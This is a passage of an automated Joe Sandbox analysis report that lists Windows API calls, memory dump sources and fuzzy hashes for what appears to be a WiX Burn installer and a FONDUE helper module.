                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorHandleInitLastModuleVariant
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 52713655-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegCloseKey.ADVAPI32(80070490,00000000,80070490,00CEAAA0,00000000,80070490,?,?,00C98B19,WiX\Burn,PackageCache,00000000,00CEAAA0,00000000,00000000,80070490), ref: 00CC58CA
                                                                                                                                                                      • Part of subcall function 00CC10B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00CC112B
                                                                                                                                                                      • Part of subcall function 00CC10B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00CC1163
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: QueryValue$Close
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1979452859-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,00C98BD3,0000001C,80070490,00000000,00000000,80070490), ref: 00C834D5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FolderPath
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1514166925-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CC966B
                                                                                                                                                                      • Part of subcall function 00CC998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CC9A09
                                                                                                                                                                      • Part of subcall function 00CC998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CC9A1A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CC966B
                                                                                                                                                                      • Part of subcall function 00CC998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CC9A09
                                                                                                                                                                      • Part of subcall function 00CC998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CC9A1A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CC966B
                                                                                                                                                                      • Part of subcall function 00CC998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CC9A09
                                                                                                                                                                      • Part of subcall function 00CC998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CC9A1A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                    • Opcode ID: 025d2ec6c925f2c9f2ec437936eada40c65bbf94bebc99a582227bd0c7fb27d7
                                                                                                                                                                    • Instruction ID: 80b9604f7bd8d49891afae22fb4c6e6d7ab75b6266cb7aaa3e4e1d9c67193d5b
                                                                                                                                                                    • Opcode Fuzzy Hash: 025d2ec6c925f2c9f2ec437936eada40c65bbf94bebc99a582227bd0c7fb27d7
                                                                                                                                                                    • Instruction Fuzzy Hash: 70B012D1268042AC3B8451079D0BE37050CC1C0B11330C12EF408C20C1E8705C081133
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00C83BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,00C821CC,000001C7,80004005,8007139F,?,?,00CC0267,8007139F,?,00000000,00000000,8007139F), ref: 00C83BDB
                                                                                                                                                                      • Part of subcall function 00C83BD3: HeapSize.KERNEL32(00000000,?,00C821CC,000001C7,80004005,8007139F,?,?,00CC0267,8007139F,?,00000000,00000000,8007139F), ref: 00C83BE2
                                                                                                                                                                    • lstrlenW.KERNEL32(000001C7,000001C7,80004005,00000000,?,cabextract.cpp,000001C7), ref: 00C8139C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$ProcessSizelstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3492610842-0
                                                                                                                                                                    • Opcode ID: 1d42e11a16f51578c9305b465d6b347e1d14cc827a6e12b8ac66fdda19498bd9
                                                                                                                                                                    • Instruction ID: 39cc164cb3cb039c9c894ecccdd3ceea8c870e855558ef495ebcd4448dd1b5db
                                                                                                                                                                    • Opcode Fuzzy Hash: 1d42e11a16f51578c9305b465d6b347e1d14cc827a6e12b8ac66fdda19498bd9
                                                                                                                                                                    • Instruction Fuzzy Hash: AB21EA32D00118AFCB12AF69D840BADB7FDEF84368F194155EC5467260C7359E539B88
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetSaveFileNameW.COMDLG32(?), ref: 5BB39397
                                                                                                                                                                    • memset.MSVCRT ref: 5BB393A9
                                                                                                                                                                    • AllocConvertMultiSZNameToAEx.FONDUE(00000000,00000001), ref: 5BB3943A
                                                                                                                                                                    • free.MSVCRT ref: 5BB395F4
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB39607
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB39617
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB39627
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB39637
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB39647
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB3966A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeGlobal$Name$AllocConvertFileMultiSavefreememset
                                                                                                                                                                    • String ID: L
                                                                                                                                                                    • API String ID: 2849690568-2909332022
                                                                                                                                                                    • Opcode ID: 6f89c6a9fae0c5476ff7450a0bb8e4784becf555294f8ee5839a91709fc408a9
                                                                                                                                                                    • Instruction ID: 21d808c19f2bf60455c18e43e1fa0dcd5e9bd532f6718678bc66986b2e27de0b
                                                                                                                                                                    • Opcode Fuzzy Hash: 6f89c6a9fae0c5476ff7450a0bb8e4784becf555294f8ee5839a91709fc408a9
                                                                                                                                                                    • Instruction Fuzzy Hash: 81B1C7B5A01208EFDB04DF94C484BEDBBB2FB48311F108159E94A9B295D7B5EAC1CF94
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 5BB46800
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000), ref: 5BB46829
                                                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 5BB4683C
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 5BB46865
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000000,00000000,00000000), ref: 5BB46884
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,?,00000000,00000000), ref: 5BB468A3
                                                                                                                                                                    • FindWindowExA.USER32(?,?,?,?), ref: 5BB468BC
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 5BB468D7
                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 5BB468E4
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 5BB468FC
                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 5BB46909
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharGlobalMultiWide$AllocFreelstrlen$FindWindow
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1626120915-0
                                                                                                                                                                    • Opcode ID: 480694980ddb106a3a8d57d6accc4018b86072180fcf76bd1330face988a9efc
                                                                                                                                                                    • Instruction ID: 38e61f1c64c01b46d597e86f1ecfd16b7634c50691c6ecede228006a5ea1d5ac
                                                                                                                                                                    • Opcode Fuzzy Hash: 480694980ddb106a3a8d57d6accc4018b86072180fcf76bd1330face988a9efc
                                                                                                                                                                    • Instruction Fuzzy Hash: FF41D6B5A00609AFDB04DF98C849FAEB7B6FB48710F104219FA25B72C4D7B5A940DB64
                                                                                                                                                                    APIs
                                                                                                                                                                    • StartDocW.GDI32(?,?), ref: 5BB383C9
                                                                                                                                                                    • SetLastError.KERNEL32(00000008), ref: 5BB383DD
                                                                                                                                                                    • memset.MSVCRT ref: 5BB383EB
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB38413
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB38487
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB38497
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB384A7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeGlobal$ByteCharErrorFromLastMultiStartWidememset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3584426206-0
                                                                                                                                                                    • Opcode ID: 6abe2c60daa5fcda0ba1dd3f3a64e22e9c92c67b6be7a1158dffddfdeda54af3
                                                                                                                                                                    • Instruction ID: 9d7f381b9fc1066624e1d70141abf82ecf9c865936cfe4d8509ca253bbf3e802
                                                                                                                                                                    • Opcode Fuzzy Hash: 6abe2c60daa5fcda0ba1dd3f3a64e22e9c92c67b6be7a1158dffddfdeda54af3
                                                                                                                                                                    • Instruction Fuzzy Hash: B53106B5D00208EFDB40DFA0D888BAEB7B5FB44301F00C659E9156B290D7B5DA84DF96
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetLastError.KERNEL32(00000008), ref: 5BB423A7
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB423B7
                                                                                                                                                                      • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB423E3
                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 5BB42400
                                                                                                                                                                    • RegSetValueA.ADVAPI32(00000000,00000000,00000000,00000000,?), ref: 5BB42455
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB42468
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB42478
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharFromMultiWide$FreeGlobal$ErrorLastValuelstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2318199773-0
                                                                                                                                                                    • Opcode ID: ad980b04aed37ae1c4385e259f75cb8f6ea759551a7cb4b7db3e2f4f4949b57c
                                                                                                                                                                    • Instruction ID: 62f50d4aa6feed3817b429dc07edf9552c1dc7ce7379a4b05b1e5e0691334358
                                                                                                                                                                    • Opcode Fuzzy Hash: ad980b04aed37ae1c4385e259f75cb8f6ea759551a7cb4b7db3e2f4f4949b57c
                                                                                                                                                                    • Instruction Fuzzy Hash: E43117B1D10219EFCF00DFA4C848BAEBBB2FB08301F008959EA15A3244D3B59694FF95
                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.MSVCRT ref: 5BB31BCB
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(?), ref: 5BB31C8B
                                                                                                                                                                      • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(?), ref: 5BB31CD6
                                                                                                                                                                    • PrintDlgA.COMDLG32(00000042), ref: 5BB31D0D
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB31DA2
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB31DD5
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                     • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharFromMultiWide$FreeGlobal$Printmemset
                                                                                                                                                                    • String ID: B
                                                                                                                                                                    • API String ID: 4070397486-1255198513
                                                                                                                                                                    • Opcode ID: 0bf65f0da40171ee638707cf269d2bb20f1598853ffc4a69b58c8d846a67d364
                                                                                                                                                                    • Instruction ID: 6afe108593f5a5b3b6ae20c4d97b56e74a9d46c06e0c05ca8afe2fec5f6e2bc5
                                                                                                                                                                    • Opcode Fuzzy Hash: 0bf65f0da40171ee638707cf269d2bb20f1598853ffc4a69b58c8d846a67d364
                                                                                                                                                                    • Instruction Fuzzy Hash: FF81B978A01209DFDB08DF55D080AAEBBB2FF88350F248159EC499B355D775EA81CB98
                                                                                                                                                                    APIs
                                                                                                                                                                    • _SendMessage@16.FONDUE(?,00000466,?,?), ref: 5BB38BD5
                                                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 5BB38BE9
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 5BB38C12
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 5BB38C33
                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 5BB38C40
                                                                                                                                                                    • _SendMessage@16.FONDUE(?,00000466,?,00000000), ref: 5BB38C5A
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,?), ref: 5BB38C76
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB38C83
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                     • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharGlobalMessage@16MultiSendWidelstrlen$AllocFree
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 559837489-0
                                                                                                                                                                    • Opcode ID: 7d503c574b1bb77846c3655609ca3e72deaa09b1007aa7541d8f5377833cd8eb
                                                                                                                                                                    • Instruction ID: 49e6a8a00100dc3da80ad0077e4f2cd83a2ab268223cb2c3a0b1d2a1593ad430
                                                                                                                                                                    • Opcode Fuzzy Hash: 7d503c574b1bb77846c3655609ca3e72deaa09b1007aa7541d8f5377833cd8eb
                                                                                                                                                                    • Instruction Fuzzy Hash: 1631ECB5E00209BFDB04DFD8C845FBEB7B9FB48700F108159FA14A7284D6B5AA40DBA5
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetLastError.KERNEL32(00000008), ref: 5BB3BFB4
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3BFC4
                                                                                                                                                                      • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3BFE1
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3BFFE
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB3C034
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB3C044
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB3C054
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                     • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharFromMultiWide$FreeGlobal$ErrorLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2933462567-0
                                                                                                                                                                    • Opcode ID: 282f1ecc40d1c3fcd6310e711a16570b67b82778b5815e8426d672c8ba0b0641
                                                                                                                                                                    • Instruction ID: cd61925089f64557de00c77e863698e2e42172ca2950e6fbc49bd8f366a6bcce
                                                                                                                                                                    • Opcode Fuzzy Hash: 282f1ecc40d1c3fcd6310e711a16570b67b82778b5815e8426d672c8ba0b0641
                                                                                                                                                                    • Instruction Fuzzy Hash: 4D2125B5D00249EFDB01DFE0C848BAEB7B4FB04305F108569E411A7284D7FA9A84EF95
                                                                                                                                                                    APIs
                                                                                                                                                                    • CharLowerW.USER32(?), ref: 5BB39BFA
                                                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 5BB39C0F
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000), ref: 5BB39C38
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000000,00000000,00000000), ref: 5BB39C57
                                                                                                                                                                    • CharLowerA.USER32(?), ref: 5BB39C64
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 5BB39C71
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 5BB39C8C
                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 5BB39C99
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                     • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                     • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Char$ByteGlobalLowerMultiWidelstrlen$AllocFree
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 434613974-0
                                                                                                                                                                    • Opcode ID: be6cd5741e48f0bb0fe5f6489410ccb9cb4e9ed5885e87f0cdb97671d6c308f2
                                                                                                                                                                    • Instruction ID: c18ed40c5d4a7a8502386fae04a0a5d3e83a635e692e35cd3794b362e9c86e6f
                                                                                                                                                                    • Opcode Fuzzy Hash: be6cd5741e48f0bb0fe5f6489410ccb9cb4e9ed5885e87f0cdb97671d6c308f2
